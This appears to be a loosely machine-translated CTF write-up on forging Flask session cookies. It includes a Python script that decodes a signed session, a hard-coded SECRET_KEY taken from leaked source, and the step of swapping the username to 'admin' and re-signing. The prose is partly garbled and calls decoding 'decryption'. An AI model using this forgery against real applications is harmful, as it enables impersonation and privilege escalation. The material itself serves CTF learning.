Knowledge Point: flask session forgery
flask in the session is stored in the client a cookie, which is stored locally. flask only the data is signed. It is well known, signature role is tamper-resistant, and can not prevent being read. The fla does not provide encryption, so its entirety session can all be read at the client, which may cause some security issues
This question is leaked source code, is written with a flask (wp looked at some of the master, said to be seen flask directly to see what route) to determine what has the function
Decrypt the session by script:
#!/usr/bin/env python3 import sys import zlib from base64 import b64decode from flask.sessions import session_json_serializer from itsdangerous import base64_decode def decryption(payload): payload, sig = payload.rsplit(b'.', 1) payload, timestamp = payload.rsplit(b'.', 1) decompress = False if payload.startswith(b'.'): payload = payload[1:] decompress = True try: payload = base64_decode(payload) except Exception as e: raise Exception('Could not base64 decode the payload because of ' 'an exception') if decompress: try: payload = zlib.decompress(payload) except Exception as e: raise Exception('Could not zlib decompress the payload before ' 'decoding the payload') return session_json_serializer.loads(payload) if __name__ == '__main__': print(decryption(sys.argv[1].encode()))
To generate the admin session also need SECRET_KEY
In config.py were found SECRET_KEY
SECRET_KEY = os.environ.get('SECRET_KEY') or 'ckj123'
Just out of the session will be decrypted in the name replaced admin, and encryption.
Found online encryption script
Learning Link:
The flask session & Python Web Format string vulnerabilities